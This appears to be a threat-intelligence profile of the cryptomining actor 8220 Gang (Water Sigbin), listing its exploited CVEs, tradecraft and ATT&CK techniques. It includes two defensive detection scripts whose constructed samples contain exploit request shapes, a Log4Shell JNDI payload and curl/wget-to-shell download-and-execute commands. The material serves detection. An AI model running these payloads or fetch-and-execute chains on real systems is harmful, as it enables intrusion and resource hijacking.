Financially motivated | Attributed origin: CN | 9 malware families | Exploits CVEs in the wild

8220 Gang

Also known as: 8220_gang, Water Sigbin

8220 Gang, also known as Water Sigbin, is a financially motivated, China-based threat actor (intrusion set) focused primarily on deploying cryptocurrency-mining malware, especially XMRig/CoinMiner, to hijack victim resources. The group has been described as active since at least 2017.

Targeting covers vulnerable cloud environments, Windows and Linux web servers, VMware Horizon servers, Oracle WebLogic servers, and misconfigured containerized environments. Reported sectors and geographies include healthcare, telecommunications, financial services, Korean energy-related companies, and victims in the United States, South Africa, Spain, Colombia, Mexico, Asia, and South America.

Initial access is opportunistic mass exploitation of public-facing applications. Across the reporting the group is tied to Oracle WebLogic vulnerabilities CVE-2017-3506, CVE-2017-10271, CVE-2019-2725, CVE-2020-14883 (usually chained with CVE-2020-14882) and CVE-2023-21839; Atlassian Confluence vulnerabilities CVE-2021-26084 and CVE-2022-26134; and Apache Log4j (Log4Shell, CVE-2021-44228) as exposed by VMware Horizon. WebLogic exploitation has been reported as crafted XML sent in HTTP requests.

Observed tradecraft:
  • Execution: PowerShell on Windows; shell and Python scripts on Linux.
  • Payload retrieval: cURL, wget, lwp-download, Python urllib, and PowerShell WebClient.
  • Obfuscation: base64 encoding, hexadecimal-encoded URLs, batch scripts concealed in environment variables, and HTTP carried over port 443.
  • In-memory execution: fileless execution through .NET reflection, reflective DLL injection, and process hollowing.
  • Persistence: scheduled tasks on Windows; cron jobs and systemd services on Linux.
  • Defense evasion: disabling or bypassing security tooling, including AMSI and cloud protection tools; modifying SELinux settings and /etc/ld.so.preload; deleting logs.
  • Competition: killing rival miners on compromised hosts.
  • Lateral movement: SSH brute force and abuse of existing SSH keys.
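The initial-access pattern above is visible in ordinary web-server access logs. The following is an added example (not Mallory's code and not a script attributed to the actor) that parses combined-format log lines and flags the request shapes associated with the CVEs listed above. The endpoint and payload patterns are my own mapping from the public advisories for those CVEs, not something this page states; the log lines are constructed and use RFC 5737 documentation addresses. One caveat: CVE-2023-21839 is reached over T3/IIOP rather than HTTP, so it leaves nothing in these logs and is deliberately not covered.

```python
"""Access-log triage for the initial-access tradecraft listed above.

Added example (not Mallory's code). Request shapes are an assumption taken
from the public advisories for the CVEs on this page; the log lines are
constructed and use RFC 5737 addresses. CVE-2023-21839 (T3/IIOP) is not
visible in HTTP access logs and is intentionally absent.
"""
import re
from urllib.parse import unquote

# Combined log format; the URI group stops at the first space.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Log4j lookup wrappers commonly used to hide the literal "jndi" token.
NEST_RE = re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.I)
DEFAULT_RE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
JNDI_RE = re.compile(r"\$\{jndi:", re.I)


def deep_unquote(s, rounds=2):
    """URL-decode twice so %252e%252e%252f (double-encoded ../) becomes visible."""
    for _ in range(rounds):
        s = unquote(s)
    return s


def normalize_log4j(s):
    """Collapse ${lower:x}, ${upper:x} and ${...:-x} to the literal x, repeatedly."""
    prev = None
    while prev != s:
        prev = s
        s = NEST_RE.sub(lambda m: m.group(1), s)
        s = DEFAULT_RE.sub(lambda m: m.group(1), s)
    return s


def classify(rec):
    """Return the rule names a parsed record trips (empty list if benign)."""
    hits = []
    uri = deep_unquote(rec["uri"])
    path, _, query = uri.partition("?")
    # CVE-2017-10271 / CVE-2019-2725 shape: XML posted to the WLS-WSAT / async endpoints
    if rec["method"] == "POST" and path.startswith(("/wls-wsat/", "/_async/")):
        hits.append("weblogic-xml-deserialization-endpoint")
    # CVE-2020-14882/14883 shape: double-encoded traversal into the admin console
    if "/console/" in path and "../console.portal" in path:
        hits.append("weblogic-console-traversal")
    # CVE-2022-26134 shape: OGNL in the path; CVE-2021-26084 shape: OGNL via queryString
    if path.startswith("/${") or ("entervariables.action" in path and "\\u0027" in query):
        hits.append("confluence-ognl-injection")
    # CVE-2021-44228: JNDI lookup in any attacker-controlled field
    for field in (uri, rec["ua"], rec["referer"]):
        if JNDI_RE.search(normalize_log4j(deep_unquote(field))):
            hits.append("log4shell-jndi-lookup")
            break
    return hits


def scan_access_log(text):
    """Parse each line and return only the records that trip a rule."""
    out = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real pipeline should count these
        rec = m.groupdict()
        hits = classify(rec)
        if hits:
            out.append({"ip": rec["ip"], "ts": rec["ts"], "uri": rec["uri"], "hits": hits})
    return out


# Constructed sample lines (not real traffic); the last one is benign.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2023:12:00:01 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 1234 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2023:12:00:02 +0000] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1" 200 4321 "-" "curl/7.68.0"
203.0.113.7 - - [10/Dec/2023:12:00:03 +0000] "GET /%24%7B1%2B1%7D/ HTTP/1.1" 302 0 "-" "python-requests/2.25"
203.0.113.7 - - [10/Dec/2023:12:00:04 +0000] "GET /pages/createpage-entervariables.action?SpaceKey=x&queryString=%5Cu0027%2B%7B1%2B1%7D HTTP/1.1" 200 88 "-" "python-requests/2.25"
203.0.113.7 - - [10/Dec/2023:12:00:05 +0000] "GET /portal/ HTTP/1.1" 200 10 "-" "${${lower:j}ndi:ldap://203.0.113.7:1389/a}"
198.51.100.5 - - [10/Dec/2023:12:00:06 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for r in scan_access_log(SAMPLE_LOG):
        print(r["ip"], r["ts"], ",".join(r["hits"]), r["uri"])
```

Decoding twice before matching is the point of `deep_unquote`: the WebLogic console traversal only resolves to `../` after the second round, and a rule written against the raw path misses it. The Log4j normalizer is likewise a small fixed-point loop rather than a single regex, because wrappers can be nested.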
Malware and tooling named in the reporting: Hadooken, K4Spreader, Tsunami, ScrubCrypt, PureCrypter, AgentTesla, rhajk, nasqa, dbused, spirit, spirit-pro, hxx, px, pasx, and XMRig/CoinMiner. Tsunami is an IRC-controlled backdoor used for remote control, botnet enrolment, and DDoS. The only related naming in the reporting is Water Sigbin, Trend Micro's name for the same cluster.
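The Linux persistence and defense-evasion tradecraft listed in the profile (cron and systemd persistence, /etc/ld.so.preload changes, SELinux tampering, download-and-execute chains, base64 and hex obfuscation, killing rival miners) is cheap to sweep for on a suspect host. The following is an added example, not Mallory's code and not any script attributed to the actor: it applies a handful of rules to the artifact types named above, decodes base64 and hex-encoded stages, and rescans the decoded content so layered obfuscation does not hide the final command. All sample artifacts are constructed; the URLs, paths and the competitor miner names in the kill rule are assumptions for illustration, not indicators.

```python
"""Linux host triage for the persistence and defense-evasion tradecraft above.

Added example (not Mallory's code or a reported script). Every artifact below
is constructed to resemble the described behaviour; URLs, paths and process
names are assumptions for illustration, not indicators.
"""
import base64
import re

DOWNLOAD_TOOLS = r"(?:curl|wget|lwp-download|urllib|WebClient|Invoke-WebRequest)"
# a fetch piped straight into a shell, or fetched text handed to exec()
DOWNLOAD_EXEC = re.compile(DOWNLOAD_TOOLS + r".*?(?:\|\s*(?:ba|z)?sh\b|\bexec\()", re.I)
B64_PIPE = re.compile(r"echo\s+['\"]?([A-Za-z0-9+/=]{8,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)")
HEX_RUN = re.compile(r"(?:\\x[0-9a-fA-F]{2}){4,}")
SELINUX_OFF = re.compile(r"\bsetenforce\s+0\b|SELINUX\s*=\s*disabled", re.I)
# competitor miner names are an assumption; extend them from your own telemetry
KILL_MINER = re.compile(r"\b(?:pkill|killall|kill\s+-9)\b.*\b(?:xmrig|minerd|kinsing|kdevtmpfsi)\b", re.I)

RULES = [
    ("download-and-execute chain", DOWNLOAD_EXEC),
    ("SELinux enforcement disabled", SELINUX_OFF),
    ("competing miner process killed", KILL_MINER),
]


def decode_hex_runs(text):
    """Turn \\xNN runs (hex-encoded URLs) back into readable text."""
    return HEX_RUN.sub(
        lambda m: bytes.fromhex(m.group(0).replace("\\x", "")).decode("latin-1"), text)


def decode_b64_pipes(text):
    """Return the decoded payload of every 'echo <b64> | base64 -d' stage."""
    stages = []
    for m in B64_PIPE.finditer(text):
        try:
            stages.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError: not really base64
            continue
    return stages


def scan_text(source, text, findings, depth=0):
    """Apply every rule to one artifact, then decode and rescan any encoded stage."""
    text = decode_hex_runs(text)
    for name, rx in RULES:
        if rx.search(text):
            findings.append((source, name, text.strip()))
    if depth < 3:  # bound recursion on nested encodings
        for stage in decode_b64_pipes(text):
            findings.append((source, "base64 stage decoded", stage))
            scan_text(source + " (decoded)", stage, findings, depth + 1)
    return findings


def triage(cron_lines, unit_text, ld_preload, history):
    """Walk the artifact types the reporting names; return (source, rule, evidence)."""
    findings = []
    for line in cron_lines:
        scan_text("cron", line, findings)
    for line in unit_text.splitlines():
        if line.startswith("ExecStart="):
            scan_text("systemd ExecStart", line, findings)
    for entry in ld_preload.split():  # any entry in ld.so.preload deserves review
        findings.append(("/etc/ld.so.preload", "preload library present", entry))
    for line in history:
        scan_text("shell history", line, findings)
    return findings


# Constructed samples (assumption: shaped like the reported tradecraft).
INNER = "curl -fsSL http://203.0.113.10/x.sh | sh"
SAMPLE_CRON = [
    "*/15 * * * * (curl -fsSL http://203.0.113.10/x.sh || wget -qO- http://203.0.113.10/x.sh) | bash",
    "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf",
]
SAMPLE_SYSTEMD_UNIT = """[Unit]
Description=Network Time Sync
[Service]
ExecStart=/bin/sh -c "wget -qO- http://203.0.113.10/p.sh | sh"
Restart=always
[Install]
WantedBy=multi-user.target
"""
SAMPLE_LD_PRELOAD = "/usr/local/lib/libsystemd-shared.so\n"
SAMPLE_HISTORY = [
    "setenforce 0",
    "pkill -9 -f xmrig",
    "echo %s | base64 -d | sh" % base64.b64encode(INNER.encode()).decode(),
    "wget -qO- " + "".join("\\x%02x" % b for b in b"http://203.0.113.10/p.sh") + " | bash",
]

if __name__ == "__main__":
    for src, rule, evidence in triage(SAMPLE_CRON, SAMPLE_SYSTEMD_UNIT, SAMPLE_LD_PRELOAD, SAMPLE_HISTORY):
        print(f"[{src}] {rule}: {evidence}")
```

The rescan after decoding is what matters: the base64 history line trips no rule on its own, and only the decoded stage reveals the curl-to-shell chain, which is exactly how layered encoding is meant to defeat line-oriented matching.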


OPERATIONAL PROFILE

Targeting

Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.

Where they're from

Attributed origin per open-source reporting.

  • CN
MITRE ATT&CK

Tradecraft

19 distinct techniques observed across reporting, spanning 9 of 15 tactics (23 entries below, as T1055, T1055.002 and T1112 appear under more than one tactic). ×N = number of intelligence reports citing that technique.
TA0001 Initial Access (1 technique)
  • T1190 Exploit Public-Facing Application
TA0002 Execution (2 techniques)
  • T1059 Command and Scripting Interpreter
    • T1059.001 PowerShell ×2
  • T1203 Exploitation for Client Execution
TA0003 Persistence (1 technique)
  • T1112 Modify Registry
TA0004 Privilege Escalation (1 technique)
  • T1055 Process Injection
    • T1055.002 Portable Executable Injection
TA0005 Defense Evasion (5 techniques)
  • T1027 Obfuscated Files or Information
    • T1027.010 Command Obfuscation
  • T1055 Process Injection
    • T1055.002 Portable Executable Injection
  • T1140 Deobfuscate/Decode Files or Information
  • T1564 Hide Artifacts
    • T1564.003 Hidden Window
  • T1620 Reflective Code Loading
TA0112 Defense Impairment (1 technique)
  • T1112 Modify Registry
TA0008 Lateral Movement (1 technique)
  • T1210 Exploitation of Remote Services
TA0011 Command and Control (3 techniques)
  • T1071 Application Layer Protocol
    • T1071.001 Web Protocols
  • T1105 Ingress Tool Transfer ×2
  • T1132 Data Encoding
    • T1132.001 Standard Encoding
TA0040 Impact (1 technique)
  • T1496 Resource Hijacking
WEAPONIZED

Associated vulnerabilities

6 CVEs this actor has used in observed campaigns, all 6 exploited in the wild.

1 more CVE tied to this actor tracked in Mallory.

IOCS

Observables

29 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. Indicator values are not shown on this public page.

ACTIVITY FEED

Recent activity

8 sources tracked across advisories, community write-ups, and news.

Source: security online info (News), Oct 1, 2024
Hadooken & K4Spreader Malware: 8220 Gang's Latest Cloud Hijacking Tools

Opportunistic cloud-focused intrusion set exploiting Oracle WebLogic vulnerabilities to compromise Windows and Linux cloud servers, disable security tooling, spread laterally via SSH brute force, establish persistence (cron/systemd), and deploy Monero cryptominers; also deploys the Tsunami IRC-controlled backdoor for botnet/DDoS capability.
Source: Trend Micro Research (News), Jun 28, 2024
Examining Water Sigbin's Infection Routine Leading to an XMRig Cryptominer

Water Sigbin is known for exploiting Oracle WebLogic vulnerabilities to deploy cryptocurrency miners, specifically using a sophisticated multi-stage, fileless malware delivery chain that leverages reflective DLL injection, process injection, and anti-debugging techniques. The group primarily deploys the PureCrypter loader and XMRig miner, focusing on evasion and persistence.
Source: Trend Micro Research (News), May 30, 2024
Decoding Water Sigbin's Latest Obfuscation Tricks

China-based threat actor active since at least 2017 that focuses on deploying cryptocurrency-mining malware, primarily in cloud-based environments and Linux servers, and in this campaign exploited Oracle WebLogic vulnerabilities to deliver a miner while using layered obfuscation and fileless execution techniques.
Source: Imperva Blog (News), Dec 14, 2023
Imperva Detects Undocumented 8220 Gang Activities

The 8220 gang is a financially motivated threat actor known for mass deployment of cryptojacking malware targeting both Windows and Linux web servers. They exploit well-known vulnerabilities in public-facing applications to propagate malware, primarily for illicit cryptocurrency mining. Their operations are opportunistic, targeting a range of industries and geographies, and they frequently reuse infrastructure and TTPs.